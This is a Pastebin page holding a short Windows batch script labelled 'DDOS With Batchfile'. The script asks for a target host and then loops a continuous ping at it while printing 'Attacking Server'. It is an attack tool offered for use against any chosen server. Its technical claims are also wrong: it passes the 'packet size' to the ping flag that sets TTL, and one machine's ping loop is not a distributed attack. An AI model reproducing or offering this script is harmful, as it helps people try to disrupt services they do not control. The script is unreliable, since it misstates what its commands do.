Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cls
- echo.
- echo DDOS With Batchfile
- echo.
- set /p x=Server-Target:
- echo.
- ping %x%
- @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
- goto Next
- :Next
- echo.
- echo.
- echo.
- set /p m=ip Host:
- echo.
- set /p n=Packet Size:
- echo.
- :DDOS
- color 0c
- echo Attacking Server %m%
- ping %m% -i %n% -t >nul
- goto DDOS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement